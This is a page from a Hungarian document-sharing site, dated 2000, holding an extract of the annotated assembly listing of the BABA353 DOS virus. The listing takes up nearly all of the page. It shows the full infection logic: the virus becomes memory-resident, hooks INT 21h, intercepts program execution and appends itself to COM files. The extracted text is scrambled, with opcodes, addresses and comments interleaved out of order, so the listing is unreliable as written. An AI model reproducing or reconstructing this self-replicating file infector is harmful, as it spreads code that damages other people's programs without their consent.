Information Technology | IT security » A BABA353 vírus forráskódja

Datasheet

Year, pagecount:2000, 9 page(s)

Language:Hungarian

Downloads:585

Uploaded:May 16, 2006

Size:19 KB

Institution:
-

Comments:

Attachment:-

Download in PDF:Please log in!



Comments

No comments yet. You can be the first!

Content extract

BABA353 Vírus 0100 E8E503 CALL 04E8 0103 0F0000 SLDT [BX+SI] 04E8 5E 04E9 E80000 POP ;Call the virus SI ; CALL 04EC 04EC 5E POP 04ED 1E PUSH DS 04EE 06 PUSH ES 04EF 56 PUSH SI ; SI ; SI=Virus entry point ; save registers ; ; 04F0 8CC8 MOV AX,CS ; 04F2 8EC0 MOV ES,AX ; ES=CS 04F4 8ED0 MOV DS,AX ; DS=CS 04F6 BF0001 MOV DI,0100 ; Restore original first 04F9 81C64601 ADD SI,0146 ; 4 bytes of the infected 04FD B90400 MOV CX,0004 0500 FC 0501 F3A4 0503 5E 0504 B8BABA 0507 CD21 0509 3DCCFA CLD ; file ; REP MOVSB POP SI MOV INT 21 CMP ; ; Check, if the INT 21 AX,BABA ; is hooked by the ; virus AX,FACC ; 050C 7503 JNE 050E EB4E 0511 JMP 055E 0510 90 NOP 0511 07 POP 0512 06 PUSH ES 0513 8CC0 0515 48 ES DEC ; Not resident ; AX,ES ; ES=Pointer to MCB ES,AX MOV 051C 2D1800 AX,0018 MOV 0523 268B1E0100 ADD 052A 8EC3 MOV ; Decrease the programs ; memory by 384 bytes ES:[0003],AX MOV 0528 03D8 ;

AX,ES:[0003] SUB 051F 26A30300 ; AX MOV 0518 26A10300 ; Exit if yes ; MOV 0516 8EC0 ; Jump if not ; BX,ES:[0001] BX,AX ; Get the programs ; segment address ES,BX ; ES=Virus Segment ; address 052C 1E PUSH DS ; 052D 33C0 XOR AX,AX ; 052F 8ED8 MOV DS,AX ; DS=0000 0531 A18400 MOV 0534 2E89844201 0539 A18600 MOV MOV 053C 2E89844401 0541 1F POP MOV DS AX,[0084] ; CS:[SI+0142],AX AX,[0086] ; INT 21 address to CS:[SI+0144],AX ; ; Save the original ; the JUMP instruction 0542 33FF 0544 56 0545 83EE04 XOR DI,DI PUSH SI SUB ; DI=0000 ; Save virus entry point SI,0004 ; SI=point to the start ; of the virus code 0548 B96101 MOV CX,0161 054B F3A4 REP MOVSB ; CX=Virus code size ; Copy the virus body ; after the program 054D 5E POP SI ; restore register 054E 1E PUSH DS ; Save data segment 054F 33C0 XOR AX,AX 0551 8ED8 MOV DS,AX 0553 C70684008300 MOV 0559 8C068600 MOV ; ; DS=0000 WORD PTR [0084],0083 [0086],ES ; Set the new

INT 21 ; address 055D 1F POP DS ; Restore registers 055E 07 POP ES ; 055F 1F POP DS ; 0560 BE0001 0563 56 MOV PUSH SI SI,0100 ; Save 0100 to jump at ; 0564 33C0 XOR AX,AX ; AX=0000 0566 33DB XOR BX,BX ; BX=0000 0568 33FF XOR DI,DI 056A C3 RET ; DI=0000 ; Execute original ; program ;* ; ; NEW INT 21 ENTRY POINT ; ;* 0083 9C PUSHF 0084 50 PUSH AX ; Save registers 0085 53 PUSH DS ; 0086 1E PUSH DS ; 0087 3DBABA 008A 7508 ; Save flags CMP JNE AX,BABA 0094 ; Called by the virus ? ; Jump if not 008C 1F POP DS ; Restore registers 008D 5B POP BX ; 008E 58 POP AX ; 008F 9D POPF 0090 B8CCFA MOV ; Restore flags AX,FACC ; Set AX to indicate that ; the virus is resident 0093 CF IRET ; Exit interrupt 0094 51 PUSH CX ; Save CX 0095 8BC8 MOV CX,AX ; 0097 86CD XCHG CH,CL ; 0099 80F14B 009C 59 009D 7403 XOR POP JE CL,4B CX ; execute program? ; Restore CX 00A2 ; Jump if yes 009F E99F00 JMP 00A2 8BDA

MOV BX,DX 00A4 803F00 CMP BYTE PTR [BX],00 ; Search for the end 00A7 7403 00A9 43 00AA EBF8 00AC 83EB0B 00AF 06 JE 0149 ; Exit if not ; BX=File name offset 00AC INC BX JMP PUSH ; 00A4 SUB ; Jump if found ; Back if not BX,000B ES ; Move back 11 bytes ; Save ES 00B0 8CC8 MOV AX,CS ; 00B2 8EC0 MOV ES,AX ; ES=CS 00B4 B90B00 MOV CX,000B 00B7 BF5401 MOV DI,0154 ; Check if the running 00BA 8A07 MOV AL,[BX] ; program is the 00BC 263A05 00BF 750C CMP JNE AL,ES:[DI] 00CD 00C1 43 INC BX 00C2 47 INC DI 00C3 49 DEC CX 00C4 83F900 00C7 75F1 ; COMMAND.COM ; Jump if not the ; COMMAND.COM ; CMP JNE ; Counter = 11 bytes ; CX,0000 ; 00BA ; Jump back to check ; the next character 00C9 07 00CA EB75 POP ES JMP ; Restore ES 0141 ; Exit if yes 00CC 90 NOP 00CD 07 POP 00CE 50 PUSH AX ; Save registers 00CF 53 PUSH BX ; 00D0 51 PUSH CX ; 00D1 52 PUSH DX ; 00D2 B8023D 00D5 CD21 ; ES MOV INT ; Restore ES AX,3D02 21

; Open file ; 00D7 7261 00D9 8BD8 00DB B90400 JB 013A MOV ; Exit if error BX,AX MOV ; BX=file handle CX,0004 ; Counter=4 bytes 00DE 8CC8 MOV AX,CS ; 00E0 8ED8 MOV DS,AX ; DS=CS 00E2 B43F MOV AH,3F 00E4 BA4A01 00E7 CD21 00E9 724F MOV INT JB ; Save the first DX,014A 21 ; 4 bytes of the ; target file 013A 00FB 2E813E4A014D5A CMP ; Exit if error CS:WORD PTR [014A],5A4D ; EXE file ? 00F2 7442 JE 0136 00F4 33C9 XOR CX,CX ; CX=0000 00F6 33D2 XOR DX,DX ; DX=0000 00F8 B80242 MOV 00FB CD21 INT 00FD 3DE803 0100 7C34 0102 3D00FA 0105 772F AX,03E8 0136 CMP JA AX,4202 21 CMP JL ; Exit if yes AX,FA00 0136 ; Move file pointer to ; the end of file ; Smaller than 1000 ? ; Exit if yes ; Larger than 64000 ? ; Exit if yes 0107 2D0300 SUB 010A 2EA34F01 AX,0003 MOV CS:[014F],AX 010E 2E803E4D010F CMP 0114 7420 JE ; Check if the file is ; already infected CS:BYTE PTR [014D],0F 0136 ; Exit if yes 0116 8CC8 MOV AX,CS ; 0118

8ED8 MOV DS,AX ; DS=CS 011A B440 MOV AH,40 ; Set write mode 011C 33D2 XOR DX,DX ; DX=0000 011E B96101 0121 CD21 MOV INT CX,0161 21 ; Counter = 353 bytes ; Append the virus to ; the file 0123 33C9 XOR CX,CX ; CX=0000 0125 33D2 XOR DX,DX ; DX=0000 0127 B80042 MOV 012A CD21 INT 012C B440 MOV 012E BA4E01 AX,4200 21 MOV 0134 CD21 INT 0136 B43E MOV 0138 CD21 INT ; the beginning of file AH,40 MOV 0131 B90400 ; Set file pointer to ; Write the first 4 bytes DX,014E ; of the infected file CX,0004 21 ; ; AH,3E 21 ; Close file ; 013A 5A POP DX 013B 59 POP CX ; 013C 5B POP BX ; 013D 58 POP AX ; 013E EB01 JMP ; Restore registers 0141 ; jump to exit 0130 90 NOP 0141 1F POP DS ; Restore registers 0142 5B POP BX ; 0143 58 POP AX ; 0144 9D POPF 0145 EAEB401900 ; JMP ; Restore flags 0019:40EB ; INT 21 ; Jump to the original